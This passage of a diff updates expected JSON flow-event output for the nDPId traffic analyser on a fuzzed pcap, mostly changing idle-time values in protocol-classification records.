{"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120470796941,"flow_last_seen":1120471094413,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10425,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470949427,"flow_last_seen":1120470958433,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -1401,37 +1401,37 @@ 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00831{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00831{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00837{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"d0xa!","auth_failed":0}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": 